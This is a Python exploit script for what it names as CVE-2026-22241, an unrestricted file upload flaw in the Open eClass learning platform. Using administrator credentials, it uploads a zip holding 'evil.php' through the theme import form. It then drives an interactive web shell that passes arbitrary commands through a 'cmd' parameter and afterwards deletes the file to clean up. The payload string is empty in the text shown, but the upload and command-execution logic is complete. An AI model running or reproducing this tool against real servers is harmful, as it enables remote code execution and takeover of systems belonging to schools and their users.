import os import sys import zipfile import requests import argparse from bs4 import BeautifulSoup from argparse import RawTextHelpFormatter RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' RESET = '\033[0m' ORANGE = '\033[38;5;208m' MALICIOUS_PAYLOAD = """\ """ def banner(): print(f'''{YELLOW} ┏━╸╻ ╻┏━╸ ┏━┓┏━┓┏━┓┏━┓ ┏━┓┏━┓┏━┓╻ ╻╺┓ ┃ ┃┏┛┣╸ ╺━╸┏━┛┃┃┃┏━┛┣━┓╺━╸┏━┛┏━┛┏━┛┗━┫ ┃ ┗━╸┗┛ ┗━╸ ┗━╸┗━┛┗━╸┗━┛ ┗━╸┗━╸┗━╸ ╹╺┻╸ {RED} Author: @Ashif1337 {RESET}''') def clean_server(openeclass,filename): print(f"{ORANGE}[+] Removing Backd00r...{RESET}") # Remove the uploaded files requests.get(f"{openeclass}/courses/theme_data/{filename}?cmd=rm%20{filename}") print(f"{GREEN}[+] Server cleaned successfully!{RESET}") def execute_command(openeclass, filename): while True: # Prompt for user input with "eclass" cmd = input(f"{RED}[{YELLOW}eClass{RED}]~> {RESET}") # Check if the command is 'quit', then break the loop if cmd.lower() == "quit": clean_server(openeclass,filename) print(f"{ORANGE}[+] Exiting...{RESET}") sys.exit() # Construct the URL with the user-provided command url = f"{openeclass}/courses/theme_data/{filename}?cmd={cmd}" # Execute the GET request try: response = requests.get(url) # Check if the request was successful if response.status_code == 200: # Print the response text print(f"{GREEN}{response.text}{RESET}") except requests.exceptions.RequestException as e: # Print any error that occurs during the request print(f"{RED}An error occurred: {e}{RESET}") def upload_web_shell(openeclass, username, password): login_url = f'{openeclass}/?login_page=1' login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php' # Login credentials payload = { 'next': '/main/portfolio.php', 'uname': f'{username}', 'pass': f'{password}', 'submit': 'Enter' } headers = { 'Referer': login_page_url, } # Use a session to ensure cookies are handled correctly with requests.Session() as session: # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens session.get(login_page_url) # Post the login credentials response = session.post(login_url, headers=headers, data=payload) # Create a zip file containing the malicious payload zip_file_path = 'poc.zip' with zipfile.ZipFile(zip_file_path, 'w') as zipf: zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode()) # Get token token_url = session.get(f'{openeclass}/modules/admin/theme_options.php',allow_redirects=False) if token_url.status_code != 200 : print(f"{RED}[X] Invalid Administrator Password!{RESET}") print(f"{RED}[X] Exiting...{RESET}") return False upload_token = BeautifulSoup(token_url.text, 'html.parser').select_one('input[name="token"]')['value'] # Upload the zip file url = f'{openeclass}/modules/admin/theme_options.php' files = { 'themeFile': ('poc.zip', open(zip_file_path, 'rb'), 'application/zip'), 'import': (None, ''), 'token': (None, upload_token) } response = session.post(url, files=files) # Clean up the poc zip file os.remove(zip_file_path) # Check if the upload was successful if response.status_code == 200: print(f"{GREEN}[+] Payload uploaded successfully!{RESET}") print(f"{GREEN}[+] Type 'quit' to exit web shell!{RESET}") return True else: print(f"{RED}[X] Failed to upload payload.{RESET}") print(f"{RED}[X] Exiting...{RESET}") return False def main(): parser = argparse.ArgumentParser(description="Open eClass Unrestricted File Upload RCE Exploit [ CVE-2026-22241 ]\nExample: CVE-2026-22241.py -t http://127.0.0.1/openeclass -u admin -p adminpassword",formatter_class=RawTextHelpFormatter) parser.add_argument('-t', '--eclassUrl', required=True, help="Target URL of the Open eClass.") parser.add_argument('-u', '--username', required=True, help="Admin Username for login.") parser.add_argument('-p', '--password', required=True, help="Admin Password for login.") args = parser.parse_args() banner() # Running the main login and execute command function if upload_web_shell(args.eclassUrl, args.username, args.password): execute_command(args.eclassUrl, 'evil.php') if __name__ == "__main__": main()